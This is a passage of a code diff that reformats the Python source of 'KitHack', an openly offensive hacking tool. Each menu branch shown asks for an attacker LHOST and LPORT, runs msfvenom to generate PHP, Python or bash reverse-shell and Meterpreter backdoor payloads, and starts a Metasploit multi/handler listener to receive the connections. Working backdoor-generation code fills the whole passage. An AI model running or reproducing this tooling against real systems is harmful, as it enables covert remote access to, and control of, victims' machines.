exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '03': + elif pay == "03": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p php/reverse_php LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p php/reverse_php LHOST={0} LPORT={1} R > output/{2}.php".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: + if os.stat("output/{}.php".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/reverse_php; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/reverse_php; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif sys == '06': - print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print( - '{0}[01]{1} python/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print( - '{0}[02]{1} python/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print('{0}[03]{1} python/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[04]{1} python/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[05]{1} python/shell_reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[06]{1} python/shell_reverse_tcp_ssl'.format(WHITE, YELLOW)) - print('{0}[07]{1} python/shell_reverse_udp'.format(WHITE, YELLOW)) + elif sys == "06": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} python/meterpreter_reverse_http".format(WHITE, YELLOW)) + print("{0}[02]{1} python/meterpreter_reverse_https".format(WHITE, YELLOW)) + print("{0}[03]{1} python/meterpreter_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[04]{1} python/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[05]{1} python/shell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[06]{1} python/shell_reverse_tcp_ssl".format(WHITE, YELLOW)) + print("{0}[07]{1} python/shell_reverse_udp".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) - if pay == '01': + if pay == "01": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p python/meterpreter_reverse_http LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_http LHOST={0} LPORT={1} -f raw > output/{2}.py".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: + if os.stat("output/{}.py".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_http; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_http; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '02': + elif pay == "02": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p python/meterpreter_reverse_https LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_https LHOST={0} LPORT={1} -f raw > output/{2}.py".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: + if os.stat("output/{}.py".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_https; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_https; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '03': + elif pay == "03": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p python/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: + if os.stat("output/{}.py".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '04': + elif pay == "04": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: + if os.stat("output/{}.py".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '05': + elif pay == "05": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p python/shell_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p python/shell_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: + if os.stat("output/{}.py".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '06': + elif pay == "06": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p python/shell_reverse_tcp_ssl LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p python/shell_reverse_tcp_ssl LHOST={0} LPORT={1} -f raw > output/{2}.py".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: + if os.stat("output/{}.py".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '07': + elif pay == "07": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p python/shell_reverse_udp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p python/shell_reverse_udp LHOST={0} LPORT={1} -f raw > output/{2}.py".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: + if os.stat("output/{}.py".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_udp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_udp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif sys == '07': - print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} cmd/unix/reverse_bash'.format(WHITE, YELLOW)) - print( - '{0}[02]{1} cmd/unix/reverse_bash_telnet_ssl'.format(WHITE, YELLOW)) + elif sys == "07": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} cmd/unix/reverse_bash".format(WHITE, YELLOW)) + print("{0}[02]{1} cmd/unix/reverse_bash_telnet_ssl".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) - if pay == '01': + if pay == "01": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - 